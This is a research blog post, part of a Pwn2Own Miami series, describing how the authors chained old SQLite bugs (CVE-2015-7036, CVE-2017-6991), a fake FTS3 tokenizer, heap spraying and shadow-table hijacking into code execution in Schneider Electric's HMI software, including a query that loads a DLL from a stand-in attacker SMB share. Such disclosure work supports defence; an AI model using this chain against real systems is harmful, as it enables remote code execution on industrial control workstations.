By Fredrik Østrem, Emil Sandstø and Cim Stordal
Welcome back to our three-part series on Pwn2Own Miami.
In our previous post, we gave a high-level overview of how we exploited a vulnerability in the Schneider Electric EcoStruxure Operator Terminal Expert, a human-machine interface (HMI) configuration software used to create and modify applications for HMI products designed by Schneider Electric.
In this part, we’ll cover in depth how we used the fact that we controlled the database, and that Schneider Electric used an outdated version of SQLite, to create a fully working exploit chain. To do this research, we stood on the shoulders of giants, building on this recent blog post by Omer Gull at Check Point Research.
What Is SQLite?
SQLite is a relational database that is meant to be embedded with the software. This is in contrast to well-known relational databases such as MySQL or PostgreSQL, which have a client-server architecture. SQLite comes pre-installed on both iOS and Android, and it’s also used by Google Chrome for implementing WebSQL.
The specific version of SQLite that we targeted and that was used by Schneider Electric was 18.104.22.168. You can download the source code here. Throughout this article we reference structures and functions from that code, so feel free to download it to follow along.
A SQLite database file stores the schema and data for tables in the database. A database table might look something like this:
sqlite> CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT);
The application gets the data from the table with a query like this one:
sqlite> SELECT * FROM customers;
However, we needed the application to run a different query that we controlled to run our exploit. The way we did this was to use database views, which are dynamically generated tables based on a SELECT query. In the database file, we replaced the CREATE TABLE statement seen above with a CREATE VIEW statement containing our own query:
sqlite> CREATE VIEW customers AS SELECT datetime();
When the application then attempted to query the table, SQLite ran the view’s query and used it to build a dynamic table instead of reading data from the database file. This made it possible to hijack any query against a table in the database, as long as we knew the name of the table. For instance, in this case we called the datetime() function, which gave the timestamp at the time the query was made:
sqlite> SELECT * FROM customers;
In their exploit, Check Point Research performed data definition language (DDL) patching when changing these queries. We were uncertain about why that would be necessary, and as a result we didn’t do it.
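The query hijack can be reproduced harmlessly with Python’s built-in sqlite3 module. The following is a minimal sketch rather than the code used in the exploit: the in-memory database, the `hijack_demo` name and the `'hijacked'` marker column are illustrative assumptions, and the table is swapped with DROP TABLE and CREATE VIEW statements instead of by editing a database file.

```python
import sqlite3


def hijack_demo():
    """Show that a view named like a table answers the application's query."""
    conn = sqlite3.connect(":memory:")

    # The schema and data the application expects to find.
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO customers (name) VALUES ('alice')")
    before = conn.execute("SELECT * FROM customers").fetchall()

    # Replace the table with a view of the same name. The application's
    # query text does not change, but SQLite now runs the view's SELECT.
    conn.execute("DROP TABLE customers")
    conn.execute(
        "CREATE VIEW customers AS "
        "SELECT 'hijacked' AS marker, datetime('now') AS ts"
    )
    after = conn.execute("SELECT * FROM customers").fetchall()

    conn.close()
    return before, after


if __name__ == "__main__":
    before, after = hijack_demo()
    print("table rows:", before)
    print("view rows: ", after)
```

The same `SELECT * FROM customers` returns stored rows before the swap and the output of the view’s query afterwards, which is all the hijack relies on.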
The first primitive we needed was a way to corrupt memory, so we could turn it into code execution. Because Schneider Electric was using an outdated version of SQLite, we had a few primitives to choose from.
We ended up looking at CVE-2015-7036, an untrusted pointer dereference bug in fts3_tokenizer.
FTS3 is a Full-Text Search Module in SQLite allowing users to do effective searches by creating FTS tables. FTS tables are special tables with a built-in full-text index. The tokenizer itself is a ruleset for how to extract tokens. The fts3_tokenizer function makes it possible to get and set tokenizers for the FTS3 module. Fortunately for us, this is done with raw pointers prior to SQLite version 3.11.0, and it’s exposed to SQL code as SQL blobs without any validation.
We took advantage of this twice: First to leak the address of the built-in simple tokenizer, then to replace the built-in porter tokenizer with our own, malicious tokenizer that we used to call a function pointer of our choice.
To get the address of the “simple” tokenizer, we simply called fts3_tokenizer with the tokenizer name (and wrapped it in hex for pretty printing):
sqlite> SELECT hex(fts3_tokenizer('simple'));
And to replace the “porter” tokenizer with our own tokenizer, we called fts3_tokenizer with the address of the new tokenizer as the second argument:
sqlite> SELECT hex(fts3_tokenizer('porter', x'4141414141414141'));
To make use of this, we needed to build our own tokenizer structure and store it somewhere on the heap at a known address. We also needed to create an FTS3 virtual table, which we named trigger, so that we could later invoke our custom tokenizer by using a MATCH expression on this table.
sqlite> CREATE VIRTUAL TABLE trigger USING FTS3(col, tokenize=porter);
sqlite> INSERT INTO trigger VALUES('haha');
Selecting a Plan for Code Execution
If we look at the sqlite3_tokenizer_module structure in the SQLite source code, we can see this structure:
As you can tell, the tokenizer structure contains multiple function pointers. Check Point Research seems to have primarily targeted xCreate(). That makes sense, as it is the first function to be executed. We chose to target xOpen() instead, as that gave us full control of the second argument at execution time through the MATCH operator. For xCreate(), we reused the simpleCreate() function that the simple tokenizer uses, to avoid crashing before xOpen() could be called. With xOpen() under our control, we wanted to be able to run our own code.
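To make the layout concrete, here is a small Python ctypes sketch that mirrors the field order of sqlite3_tokenizer_module as declared in SQLite’s fts3_tokenizer.h. It is an illustration only: the function pointers are modelled as plain `c_void_p` values, the `TokenizerModule` and `field_offsets` names are our own, and the offsets it prints depend on the pointer size of the platform running it.

```python
import ctypes


class TokenizerModule(ctypes.Structure):
    """Field order of sqlite3_tokenizer_module; pointers modelled as void*."""

    _fields_ = [
        ("iVersion", ctypes.c_int),
        ("xCreate", ctypes.c_void_p),
        ("xDestroy", ctypes.c_void_p),
        ("xOpen", ctypes.c_void_p),
        ("xClose", ctypes.c_void_p),
        ("xNext", ctypes.c_void_p),
        ("xLanguageid", ctypes.c_void_p),
    ]


def field_offsets():
    """Return {field name: byte offset} for the mirrored structure."""
    return {
        name: getattr(TokenizerModule, name).offset
        for name, _ctype in TokenizerModule._fields_
    }


if __name__ == "__main__":
    for name, offset in field_offsets().items():
        print(f"{name:12s} at offset {offset}")
    print("total size:", ctypes.sizeof(TokenizerModule))
```

Because iVersion is padded up to pointer alignment, xCreate sits one pointer width into the structure and xOpen three pointer widths in, so those are the two slots that matter for the plan described here.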
FTS3 uses the MATCH operator to perform full-text search using the tokenizer, and calls the xOpen method of our tokenizer with its right operand:
sqlite> SELECT col FROM trigger WHERE col MATCH 'controlleddata';
The controlled data ends up as the second argument to xOpen(). This meant that if there was a function that would just magically give us code execution by calling it with the right second argument and ignoring all others, we had won.
In SQLite exploitation literature, one method that keeps coming up is to “just use SQLite’s load_extension function,” which allows you to load arbitrary DLL files as SQLite extensions. However, we couldn’t do this directly, since it first had to be enabled from the host application by calling the C function sqlite3_enable_load_extension. Instead, we saw that the load_extension function only checked that it had been enabled, and then called the winDlOpen function (on Windows platforms) to actually open the DLL file.
Luckily for us, winDlOpen was the magical function that we were looking for, and it was compatible with the tokenizer’s xOpen function. We could call this function directly, thus skipping the check for whether extension loading was enabled entirely. Since we weren’t building for CYGWIN, the first argument is unused. That was perfect for us, as we had no control over that argument.
Following the code flow some more, you can see that we ended up calling osLoadLibrary with our controlled string:
Since we set the xOpen method of our tokenizer to point to winDlOpen, that function would be called when we used the MATCH operator on an FTS3 table. By giving the DLL path on the right side of the MATCH operator, we were able to load that DLL into the current process:
sqlite> SELECT col FROM trigger WHERE col MATCH 'C:\Path\To\Exploit.dll';
Now that we had a plan for our attack, we knew what primitives we needed:
- a way to leak the image base address, because we had to find the real simpleCreate() function to add to our fake tokenizer.
- the address of winDlOpen().
- a heap info leak to be able to find the location of our fake tokenizer.
Since we wrote this exploit as a SQLite query, we needed to craft some SQLite primitives in order to do basic arithmetic and heap spraying. Thankfully, many of these primitives could be borrowed from our friends at Check Point Research.
Leaking the Image Address
Because we were crafting a fake object, we needed to leak the image base to find winDlOpen() and the simpleCreate() function so that our fake tokenizer would live long enough to reach the code that calls xOpen().
To do so, we used CVE-2015-7036. This is a vulnerability that, in a nutshell, will just give you the address of the tokenizer if you ask for it, due to how SQLite used to handle pointer passing interfaces. For more information on pointer passing, see the SQLite website.
To calculate the address of the necessary functions, we needed to leak any address in the base image. Our approach was:
sqlite> CREATE VIEW tokenizer_leak_raw AS SELECT hex(fts3_tokenizer('simple')) AS col;
Here, the view exposes the address of the simple tokenizer as a hex string. Because fts3_tokenizer returns the address of the registered tokenizer as a BLOB, querying a built-in tokenizer leaks an address (in little-endian byte order) inside the SQLite module. From that address we could calculate the offsets to winDlOpen and simpleCreate.
Getting the Address of SQLite C Functions
Once we knew the address of the “simple” tokenizer module in the SQLite library image, we used pointer arithmetic to get the addresses of C functions in the library that had known static offsets.
Pointer arithmetic like this is a bit tricky, but it works like this:
- Start with a pointer stored as a blob in little-endian
- Convert to a hex string
- Flip the hex representation pairwise so that it’s in big-endian order
- Convert this to an integer
- Add the known offset of our target function address relative to the “simple” tokenizer module
- Convert back to a blob in little-endian order
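The steps above can be sketched in plain Python before worrying about how to express them in SQL. This is only an illustration of the arithmetic: the function name `add_offset_to_le_pointer`, the sample pointer value and the offset of -0x1000 are all made up for the example and are not values from the real target.

```python
def add_offset_to_le_pointer(blob: bytes, offset: int) -> bytes:
    """Apply the six steps: LE blob -> hex -> BE hex -> int -> add -> LE blob."""
    # Steps 1 and 2: the pointer arrives as a little-endian blob; hex-encode it.
    hex_le = blob.hex().upper()

    # Step 3: reverse the hex string pairwise to get big-endian order.
    pairs = [hex_le[i:i + 2] for i in range(0, len(hex_le), 2)]
    hex_be = "".join(reversed(pairs))

    # Step 4: convert the big-endian hex string to an integer.
    value = int(hex_be, 16)

    # Step 5: add the (possibly negative) offset, wrapping at pointer width.
    value = (value + offset) % (1 << (8 * len(blob)))

    # Step 6: convert back to a little-endian blob.
    return value.to_bytes(len(blob), "little")


if __name__ == "__main__":
    leaked = bytes.fromhex("60A2D45DFB7F0000")  # hypothetical leaked pointer
    target = add_offset_to_le_pointer(leaked, -0x1000)  # hypothetical offset
    print(target.hex().upper())
```

In Python steps 2 to 4 collapse into `int.from_bytes(blob, "little")`; they are spelled out here because SQL has no such helper, which is why each step needs its own primitive.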
To do this effectively, we used a technique called “query-oriented programming,” or QOP, a term coined by Check Point Research. This pretty much just means that our exploitation primitives are implemented in SQL queries. All of the techniques we used for pointer arithmetic originate from Check Point Research.
Little-endian to big-endian and vice versa
We implemented a function called Flip that flips endians.
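One way to express such a flip using nothing but SQL string functions is to concatenate the byte pairs in reverse order with substr. The sketch below runs that query through Python’s sqlite3 module; it is an assumed reconstruction for a 16-character (64-bit) hex string, not the exact Flip code from the exploit, and the sample value is hypothetical.

```python
import sqlite3

# Reverse eight two-character byte pairs of a 16-character hex string.
FLIP_SQL = """
SELECT substr(:h, 15, 2) || substr(:h, 13, 2)
    || substr(:h, 11, 2) || substr(:h,  9, 2)
    || substr(:h,  7, 2) || substr(:h,  5, 2)
    || substr(:h,  3, 2) || substr(:h,  1, 2)
"""


def flip(hex16: str) -> str:
    """Swap the byte order of a 64-bit value given as a hex string."""
    conn = sqlite3.connect(":memory:")
    try:
        return conn.execute(FLIP_SQL, {"h": hex16}).fetchone()[0]
    finally:
        conn.close()


if __name__ == "__main__":
    print(flip("60A2D45DFB7F0000"))  # hypothetical little-endian pointer
```

Applying the flip twice returns the original string, so the same primitive converts in both directions.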
Pointer to integer and integer to pointer
We used the Pack64() and Unpack64() functions to convert pointers to and from integers.
Addition and subtraction
In order to do math, i.e. to subtract an offset from a leaked pointer to find a base address, we used MathWithConst().
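To show that hex-to-integer conversion and constant addition are possible in SQL alone, here is a sketch run through Python’s sqlite3 module. It is not the Pack64(), Unpack64() or MathWithConst() code from the exploit: it swaps in a recursive common table expression with instr() and printf(), which needs a reasonably modern SQLite, and it assumes an uppercase big-endian hex string whose value fits in a signed 64-bit integer. The sample pointer and offset are hypothetical.

```python
import sqlite3

# Walk the 16 hex digits, look each one up in a digit string to get its
# value, shift it into place, sum the parts, add the offset, and format the
# result as a 16-digit uppercase hex string again.
UNPACK_ADD_PACK_SQL = """
WITH RECURSIVE idx(i) AS (
    SELECT 1 UNION ALL SELECT i + 1 FROM idx WHERE i < 16
)
SELECT printf(
    '%016X',
    sum((instr('0123456789ABCDEF', substr(:h, i, 1)) - 1) << (4 * (16 - i)))
    + :off
)
FROM idx
"""


def add_const(hex_be: str, offset: int) -> str:
    """Return hex_be + offset as a big-endian hex string, computed in SQL."""
    conn = sqlite3.connect(":memory:")
    try:
        row = conn.execute(UNPACK_ADD_PACK_SQL, {"h": hex_be, "off": offset})
        return row.fetchone()[0]
    finally:
        conn.close()


if __name__ == "__main__":
    print(add_const("00007FFB5DD4A260", -0x1000))
```

Combined with a byte-order flip before and after, this covers the whole chain from a leaked little-endian blob to an adjusted little-endian pointer.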
We used these steps to get the addresses of the SQLite C functions simpleCreate and winDlOpen, which were needed at a later step in the process.
Building a Fake Tokenizer
Calling fts3_tokenizer with a pointer as its second argument let us replace a built-in tokenizer, “porter,” with our own, pointed to by ptr. Here we set ptr to the address we would leak in our heap info leak, where we will have allocated a fake object.
Using QOP, we constructed a fake tokenizer shown in the image above:
- Set xCreate to the pointer of the simpleCreate function. This can point to any function that doesn’t crash SQLite.
- Set xOpen to the pointer of the winDlOpen function. This is what we will use to load our DLL.
- The other fields can contain arbitrary data, as they will not be used before we gain code execution. We also need to pad it with additional data at the end to ensure that we get the correct allocation size.
If you look at the code below, you’ll see that this is actually what we’re doing.
Leaking Heap Info
To leak a heap address, we used CVE-2017-6991.
sqlite> CREATE VIRTUAL TABLE leak_table USING FTS3(col);
sqlite> INSERT INTO leak_table VALUES('haha');
sqlite> CREATE VIEW raw_heap_leak AS SELECT leak_table AS col FROM leak_table;
sqlite> SELECT hex(col) FROM raw_heap_leak;
This bug is the same underlying design bug as our image base leak. It ends up giving us a pointer to an FTS3 cursor structure allocated on the heap inside a 144-byte region. For more information, see this presentation.
After reading the pointer, the object will immediately be freed and end up on the freelist. To win, we needed to reuse the same heap allocation when allocating our fake tokenizer. This enabled us to know the pointer to our fake object. In the example above, the address we leaked was 0x4040. To craft our fake sqlite3_tokenizer_module structure and fit it inside this allocation, we needed less than 144 bytes. The sqlite3_tokenizer_module is a simple structure, meaning a structure not linking to another structure. This was perfect for us. To make sure we ended up reusing the same allocation, we did a heap spray.
You don’t really need to know a whole lot about the Windows heap to perform a heap spray, just that Windows keeps a separate freelist for allocations of different sizes. For allocations up to 0x400 bytes, these buckets are 16-byte aligned.
By leaking the address of an object and freeing it, we can later attempt to allocate a new object with the same size. If we allocate all objects from the freelist, we will most likely allocate an object at the address where we leaked an address — unless someone else allocates the object before us. In the example below, you’ll see we eventually managed to reallocate 0x4040, the memory location we leaked in our heap info leak example.
In our exploit chain, we called our heap spray function, allocating HEAP_SPRAY_COUNT=128 entries. We tried to allocate all the available elements of the freelist of our size and replace it with our fake object.
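The reasoning behind the spray can be illustrated with a toy allocator in Python. This is a deliberately simplified model, not the Windows heap: the `ToyHeap` class, its last-in-first-out freelists, the base address and the single competing allocation are all assumptions chosen to show why draining the freelist for one size tends to hand back the leaked chunk.

```python
from collections import defaultdict


class ToyHeap:
    """Toy allocator with one LIFO freelist per 16-byte size bucket."""

    def __init__(self, base=0x4000, granularity=16):
        self.next_fresh = base
        self.granularity = granularity
        self.freelists = defaultdict(list)

    def _bucket(self, size):
        # Round the request up to the next multiple of the granularity.
        g = self.granularity
        return (size + g - 1) // g * g

    def alloc(self, size):
        bucket = self._bucket(size)
        if self.freelists[bucket]:
            return self.freelists[bucket].pop()  # reuse a freed chunk
        addr = self.next_fresh                    # otherwise carve a new one
        self.next_fresh += bucket
        return addr

    def free(self, addr, size):
        self.freelists[self._bucket(size)].append(addr)


def spray_hits_leaked_chunk(spray_count=128, size=144):
    """Free a 'leaked' chunk, then spray same-sized allocations over it."""
    heap = ToyHeap()
    chunks = [heap.alloc(size) for _ in range(8)]
    leaked = chunks[4]                 # address we learned from the leak
    for addr in chunks:
        heap.free(addr, size)          # leaked chunk is now on the freelist
    heap.alloc(size)                   # someone else grabs one chunk first
    sprayed = [heap.alloc(size) for _ in range(spray_count)]
    return leaked, leaked in sprayed


if __name__ == "__main__":
    leaked, hit = spray_hits_leaked_chunk()
    print(hex(leaked), "reused by spray:", hit)
```

In this model the spray succeeds whenever it requests at least as many chunks as remain on the freelist and no competing allocation takes the leaked chunk first, which mirrors the caveat in the text.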
Single Query Environment
Even though we had a known exploit documented by multiple researchers, we couldn’t apply their methods directly. This is often the case when you have a library bug, as the environment around it matters.
Our issue was that the target made a new database connection for each select statement, and because the tokenizer state and other factors are not persistent between connections, we had to rely on a single select query. However, SQLite will normally start off by preparing all tables referenced in a select statement before executing it. Part of preparing an FTS3 table is retrieving the pointer to the specified tokenizer. However, we would have to first run a select statement to set the pointer of the tokenizer (see FTS3 Primitive) to our own tokenizer. We therefore had to figure out a way to prepare an FTS3 table after we had overridden the tokenizer.
When creating an FTS3 table, SQLite also creates something called shadow tables, which are used internally by FTS3. Fortunately for us, we found that SQLite allows hijacking of those shadow tables, similar to the query hijack technique. Shadow tables are queried as separate queries internally, which gave us a solution for running multiple queries triggered by one query.
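Shadow tables are easy to observe with Python’s sqlite3 module, as the sketch below shows by listing what appears in sqlite_master after an FTS3 table is created. It only lists the tables and hijacks nothing; the `list_fts3_tables` helper is our own name, and because FTS3 is a compile-time option the function returns None when the local SQLite build lacks it.

```python
import sqlite3


def list_fts3_tables(name="target"):
    """Create an FTS3 table and return every table whose name starts with it."""
    conn = sqlite3.connect(":memory:")
    try:
        try:
            conn.execute(f"CREATE VIRTUAL TABLE {name} USING fts3(col)")
        except sqlite3.OperationalError:
            return None  # this SQLite build has no FTS3 support
        rows = conn.execute(
            "SELECT name FROM sqlite_master "
            "WHERE type = 'table' AND name LIKE ? ORDER BY name",
            (name + "%",),
        ).fetchall()
        return [row[0] for row in rows]
    finally:
        conn.close()


if __name__ == "__main__":
    print(list_fts3_tables())
```

Alongside the virtual table itself, the listing includes ordinary tables such as `target_content`, which FTS3 reads with its own internal queries.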
Loading Our DLL File
Once we were able to load DLL files, we needed to be able to load our DLL file. The biggest problem here was that the only files we were able to control were those found in the project file that we loaded initially, and that file was, to the best of our knowledge, unpacked at an arbitrary path unknown to us. We only had one shot at loading the DLL file before the application crashed, so we couldn’t just guess the file name.
Instead, we took advantage of the fact that Windows allows DLL files to be loaded from network drives — even drives that are not mounted. By setting up an SMB2 server that hosted our exploit DLL, we could use the network path of that DLL file to load it over the network from a machine that we controlled:
sqlite> SELECT col FROM trigger WHERE col MATCH '\\our-evil-machine.example.com\share\dll\exploit-dll.dll';
You can see that this was exactly what we did in the QOP code. First we set exploitDllPath to our file path:
And then we eventually used it when selecting from trigger:
Putting It All Together
Finally, we had all the parts needed for our exploit. Now we just needed to trick the application into running our malicious SQLite code. The application will perform SELECT queries on known tables when a file is loaded, so we could replace those tables with views to hijack the query and run our own query instead:
sqlite> DROP TABLE some_table;
sqlite> CREATE VIEW some_table AS SELECT exploit_query;
However, we still had a couple of problems. First of all, the application only does one SELECT statement before asking for a new connection, so we needed three things to happen in a single connection:
- Replace the “porter” tokenizer with a pointer to our own tokenizer.
- Heap spray our tokenizer data so that the pointer would point to the tokenizer.
- Trigger the tokenizer.
This was easily solved by just “adding” each step in a query, and creating new views for more complex steps:
sqlite> CREATE VIEW raw_heap_leak AS …;
sqlite> CREATE VIEW heap_spray AS …;
sqlite> CREATE VIEW some_table AS SELECT (
(SELECT fts3_tokenizer('porter', (SELECT col FROM raw_heap_leak)))
+ (SELECT * FROM heap_spray)
+ (SELECT col FROM trigger WHERE col MATCH 'exploit-dll.dll'));
The last select statement above will not work as expected. As mentioned in Single Query Environment, when an FTS3 virtual table (such as trigger) is found in a SELECT statement, the table and its tokenizer are initialized before the query is executed. However, we were replacing the tokenizer inside the query, so we weren’t able to use this to trigger our own malicious tokenizer. To work around this, we moved the trigger logic into a separate virtual table and hijacked one of its shadow tables, the `[yourtablename]_content` table:
sqlite> CREATE VIRTUAL TABLE target USING FTS3(col);
sqlite> DROP TABLE target_content;
sqlite> CREATE VIEW target_content AS SELECT 0 AS docid, (SELECT col FROM trigger WHERE col MATCH 'exploit-dll.dll');
sqlite> CREATE VIEW some_table AS SELECT (
(SELECT fts3_tokenizer('porter', (SELECT col FROM raw_heap_leak)))
+ (SELECT * FROM heap_spray)
+ (SELECT col FROM target));
The simpler way
If you want to exploit this vulnerability in a simpler and more reliable way, take a look at what Steven and Chris did; they published a good blog post about it. It turns out our assumption that load_extension was disabled was wrong: one could call load_extension directly and never have to do any memory corruption exploitation.
Building upon prior research, we have shown how easily one can write reliable exploits targeting SQLite, and as a result how important it is to keep dependencies up to date. Further, we have demonstrated the dangers of loading untrusted database files.
Stay tuned for part three, in which we’ll explain the privilege escalation.
Want to Learn More?
We’ll be presenting our research on industrial control system product security at Ignite 2020, Europe’s largest conference dedicated to industrial digitalization, on June 10–11 in Oslo, Norway. We hope to see you there!
To learn more about Ignite, go to: https://www.cogniteignite.com/